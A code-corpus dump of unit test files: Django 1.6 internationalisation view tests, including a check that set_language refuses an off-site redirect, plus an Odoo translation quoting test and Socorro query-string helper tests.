    # Write-only property: assigning self.sdl_value applies show/hide above.
    sdl_value = property(fset=_set_sdl_value)
| gpl-3.0 |
ChenJunor/hue | desktop/core/ext-py/Django-1.6.10/tests/view_tests/tests/test_i18n.py | 40 | 10256 | # -*- coding:utf-8 -*-
from __future__ import absolute_import
import gettext
import os
from os import path
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test import LiveServerTestCase, TestCase
from django.test.utils import override_settings
from django.utils import six, unittest
from django.utils._os import upath
from django.utils.module_loading import import_by_path
from django.utils.translation import override
from django.utils.text import javascript_quote
from ..urls import locale_dir
class I18NTests(TestCase):
    """ Tests django views in django/views/i18n.py """

    def test_setlang(self):
        """
        The set_language view can be used to change the session language.

        The user is redirected to the 'next' argument if provided.
        """
        for lang_code, lang_name in settings.LANGUAGES:
            post_data = dict(language=lang_code, next='/views/')
            response = self.client.post('/views/i18n/setlang/', data=post_data)
            self.assertRedirects(response, 'http://testserver/views/')
            # The chosen language must also be persisted in the session.
            self.assertEqual(self.client.session['django_language'], lang_code)

    def test_setlang_unsafe_next(self):
        """
        The set_language view only redirects to the 'next' argument if it is
        "safe" (a scheme-relative '//host/...' URL points off-site and must
        be replaced by the site root).
        """
        lang_code, lang_name = settings.LANGUAGES[0]
        post_data = dict(language=lang_code, next='//unsafe/redirection/')
        response = self.client.post('/views/i18n/setlang/', data=post_data)
        self.assertEqual(response.url, 'http://testserver/')
        self.assertEqual(self.client.session['django_language'], lang_code)

    def test_setlang_reversal(self):
        # The named URL pattern must reverse to the canonical path.
        self.assertEqual(reverse('set_language'), '/views/i18n/setlang/')

    def test_jsi18n(self):
        """The javascript_catalog can be deployed with language settings"""
        for lang_code in ['es', 'fr', 'ru']:
            with override(lang_code):
                catalog = gettext.translation('djangojs', locale_dir, [lang_code])
                # gettext only exposes ugettext (unicode) on Python 2.
                if six.PY3:
                    trans_txt = catalog.gettext('this is to be translated')
                else:
                    trans_txt = catalog.ugettext('this is to be translated')
                response = self.client.get('/views/jsi18n/')
                # response content must include a line like:
                # "this is to be translated": <value of trans_txt Python variable>
                # javascript_quote is used to be able to check unicode strings
                self.assertContains(response, javascript_quote(trans_txt), 1)
                if lang_code == 'fr':
                    # Message with context (msgctxt)
                    self.assertContains(response, r'"month name\u0004May": "mai"', 1)
class JsI18NTests(TestCase):
    """
    Tests django views in django/views/i18n.py that need to change
    settings.LANGUAGE_CODE.
    """

    def test_jsi18n_with_missing_en_files(self):
        """
        The javascript_catalog shouldn't load the fallback language in the
        case that the current selected language is actually the one translated
        from, and hence missing translation files completely.

        This happens easily when you're translating from English to other
        languages and you've set settings.LANGUAGE_CODE to some other language
        than English.
        """
        with self.settings(LANGUAGE_CODE='es'):
            with override('en-us'):
                response = self.client.get('/views/jsi18n/')
                # The Spanish (fallback) string must NOT leak into the
                # English catalog.
                self.assertNotContains(response, 'esto tiene que ser traducido')

    def test_jsi18n_fallback_language(self):
        """
        Let's make sure that the fallback language is still working properly
        in cases where the selected language cannot be found.
        """
        with self.settings(LANGUAGE_CODE='fr'):
            with override('fi'):
                # 'fi' has no catalog, so the French default must be served.
                response = self.client.get('/views/jsi18n/')
                self.assertContains(response, 'il faut le traduire')

    def testI18NLanguageNonEnglishDefault(self):
        """
        Check if the Javascript i18n view returns an empty language catalog
        if the default language is non-English, the selected language
        is English and there is not 'en' translation available. See #13388,
        #3594 and #13726 for more details.
        """
        with self.settings(LANGUAGE_CODE='fr'):
            with override('en-us'):
                response = self.client.get('/views/jsi18n/')
                self.assertNotContains(response, 'Choisir une heure')

    def test_nonenglish_default_english_userpref(self):
        """
        Same as above with the difference that there IS an 'en' translation
        available. The Javascript i18n view must return a NON empty language
        catalog with the proper English translations. See #13726 for more
        details.
        """
        extended_apps = list(settings.INSTALLED_APPS) + ['view_tests.app0']
        with self.settings(LANGUAGE_CODE='fr', INSTALLED_APPS=extended_apps):
            with override('en-us'):
                response = self.client.get('/views/jsi18n_english_translation/')
                self.assertContains(response, javascript_quote('this app0 string is to be translated'))

    def testI18NLanguageNonEnglishFallback(self):
        """
        Makes sure that the fallback language is still working properly
        in cases where the selected language cannot be found.
        """
        with self.settings(LANGUAGE_CODE='fr'):
            # 'none' is not a valid language; the French default must win.
            with override('none'):
                response = self.client.get('/views/jsi18n/')
                self.assertContains(response, 'Choisir une heure')
class JsI18NTestsMultiPackage(TestCase):
    """
    Tests for django views in django/views/i18n.py that need to change
    settings.LANGUAGE_CODE and merge JS translation from several packages.
    """

    def testI18NLanguageEnglishDefault(self):
        """
        Check if the JavaScript i18n view returns a complete language catalog
        if the default language is en-us, the selected language has a
        translation available and a catalog composed by djangojs domain
        translations of multiple Python packages is requested. See #13388,
        #3594 and #13514 for more details.
        """
        extended_apps = list(settings.INSTALLED_APPS) + ['view_tests.app1', 'view_tests.app2']
        with self.settings(LANGUAGE_CODE='en-us', INSTALLED_APPS=extended_apps):
            with override('fr'):
                response = self.client.get('/views/jsi18n_multi_packages1/')
                self.assertContains(response, javascript_quote('il faut traduire cette chaîne de caractères de app1'))

    def testI18NDifferentNonEnLangs(self):
        """
        Similar to above but with neither default or requested language being
        English.
        """
        extended_apps = list(settings.INSTALLED_APPS) + ['view_tests.app3', 'view_tests.app4']
        with self.settings(LANGUAGE_CODE='fr', INSTALLED_APPS=extended_apps):
            with override('es-ar'):
                response = self.client.get('/views/jsi18n_multi_packages2/')
                self.assertContains(response, javascript_quote('este texto de app3 debe ser traducido'))

    def testI18NWithLocalePaths(self):
        # Catalogs found via LOCALE_PATHS (here app3's locale dir, resolved
        # relative to this test module) must be merged in as well.
        extended_locale_paths = settings.LOCALE_PATHS + (
            path.join(path.dirname(
                path.dirname(path.abspath(upath(__file__)))), 'app3', 'locale'),)
        with self.settings(LANGUAGE_CODE='es-ar', LOCALE_PATHS=extended_locale_paths):
            with override('es-ar'):
                response = self.client.get('/views/jsi18n/')
                self.assertContains(response,
                    javascript_quote('este texto de app3 debe ser traducido'))
# Selenium-backed tests only run when explicitly requested via the
# DJANGO_SELENIUM_TESTS environment variable.
skip_selenium = not os.environ.get('DJANGO_SELENIUM_TESTS', False)
@unittest.skipIf(skip_selenium, 'Selenium tests not requested')
class JavascriptI18nTests(LiveServerTestCase):
    """Live-browser checks of the JS gettext catalog rendered in a template."""

    available_apps = []
    urls = 'view_tests.urls'
    # Dotted path to the webdriver class; subclasses override this to re-run
    # the suite against other browsers.
    webdriver_class = 'selenium.webdriver.firefox.webdriver.WebDriver'

    @classmethod
    def setUpClass(cls):
        # Import the webdriver lazily so a missing or broken browser driver
        # skips the suite instead of erroring out.
        try:
            cls.selenium = import_by_path(cls.webdriver_class)()
        except Exception as e:
            raise unittest.SkipTest('Selenium webdriver "%s" not installed or '
                                    'not operational: %s' % (cls.webdriver_class, str(e)))
        super(JavascriptI18nTests, cls).setUpClass()

    @classmethod
    def tearDownClass(cls):
        cls.selenium.quit()
        super(JavascriptI18nTests, cls).tearDownClass()

    @override_settings(LANGUAGE_CODE='de')
    def test_javascript_gettext(self):
        # Each element id below exercises one JS catalog function
        # (gettext, ngettext, pgettext, npgettext) against the German catalog.
        extended_apps = list(settings.INSTALLED_APPS) + ['view_tests']
        with self.settings(INSTALLED_APPS=extended_apps):
            self.selenium.get('%s%s' % (self.live_server_url, '/jsi18n_template/'))
            elem = self.selenium.find_element_by_id("gettext")
            self.assertEqual(elem.text, "Entfernen")
            elem = self.selenium.find_element_by_id("ngettext_sing")
            self.assertEqual(elem.text, "1 Element")
            elem = self.selenium.find_element_by_id("ngettext_plur")
            self.assertEqual(elem.text, "455 Elemente")
            elem = self.selenium.find_element_by_id("pgettext")
            self.assertEqual(elem.text, "Kann")
            elem = self.selenium.find_element_by_id("npgettext_sing")
            self.assertEqual(elem.text, "1 Resultat")
            elem = self.selenium.find_element_by_id("npgettext_plur")
            self.assertEqual(elem.text, "455 Resultate")

    def test_escaping(self):
        extended_apps = list(settings.INSTALLED_APPS) + ['view_tests']
        with self.settings(INSTALLED_APPS=extended_apps):
            # Force a language via GET otherwise the gettext functions are a noop!
            response = self.client.get('/jsi18n_admin/?language=de')
            # The msgctxt separator (\x04) must be escaped in the output.
            self.assertContains(response, '\\x04')
class JavascriptI18nChromeTests(JavascriptI18nTests):
    # Re-run the whole JS i18n browser suite against Chrome.
    webdriver_class = 'selenium.webdriver.chrome.webdriver.WebDriver'
class JavascriptI18nIETests(JavascriptI18nTests):
    # Re-run the whole JS i18n browser suite against Internet Explorer.
    webdriver_class = 'selenium.webdriver.ie.webdriver.WebDriver'
| apache-2.0 |
lombritz/odoo | openerp/addons/base/tests/test_translate.py | 460 | 1941 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010 OpenERP S.A. http://www.openerp.com
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import unittest
from openerp.tools.translate import quote, unquote
class TranslationToolsTestCase(unittest.TestCase):
    """Round-trip tests for the PO-file string quoting helpers."""

    def test_quote_unquote(self):
        """quote() followed by unquote() must reproduce the original string."""

        def check_roundtrip(text):
            quoted = quote(text)
            # quote() may split long strings into multiple adjacent quoted
            # lines ('"\n"'); rejoin them before unquoting, as a PO reader
            # would.
            unquoted = unquote("".join(quoted.split('"\n"')))
            # assertEqual: assertEquals is a deprecated alias (removed in
            # Python 3.12).
            self.assertEqual(text, unquoted)

        check_roundtrip("""test \nall kinds\n \n o\r
                   \\\\ nope\n\n"
                 """)

        # The ones with 1+ backslashes directly followed by
        # a newline or literal N can fail... we would need a
        # state-machine parser to handle these, but this would
        # be much slower so it's better to avoid them at the moment:
        # quote() deliberately asserts on such input.
        self.assertRaises(AssertionError, quote, """test \nall kinds\n\no\r
                   \\\\nope\n\n"
                 """)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
Serg09/socorro | webapp-django/crashstats/base/tests/test_helpers.py | 11 | 1986 | from nose.tools import eq_
from django.test.client import RequestFactory
from crashstats.base.tests.testbase import TestCase
from crashstats.base.helpers import (
change_query_string
)
class TestChangeURL(TestCase):
    """Unit tests for the change_query_string template helper."""

    @staticmethod
    def _change(path, **kwargs):
        """Build a fake request for *path* and run the helper on it."""
        context = {'request': RequestFactory().get(path)}
        return change_query_string(context, **kwargs)

    def test_root_url_no_query_string(self):
        eq_(self._change('/'), '/')

    def test_with_path_no_query_string(self):
        eq_(self._change('/page/'), '/page/')

    def test_with_query_string(self):
        # An unchanged query string round-trips untouched.
        eq_(self._change('/page/?foo=bar&bar=baz'), '/page/?foo=bar&bar=baz')

    def test_add_query_string(self):
        eq_(self._change('/page/', foo='bar'), '/page/?foo=bar')

    def test_change_query_string(self):
        eq_(self._change('/page/?foo=bar', foo='else'), '/page/?foo=else')

    def test_remove_query_string(self):
        # Passing None for a key deletes it (and the now-empty '?').
        eq_(self._change('/page/?foo=bar', foo=None), '/page/')

    def test_remove_leave_some(self):
        eq_(self._change('/page/?foo=bar&other=thing', foo=None),
            '/page/?other=thing')

    def test_change_query_without_base(self):
        # _no_base drops the path and returns only the query string.
        eq_(self._change('/page/?foo=bar', foo='else', _no_base=True),
            '?foo=else')
| mpl-2.0 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.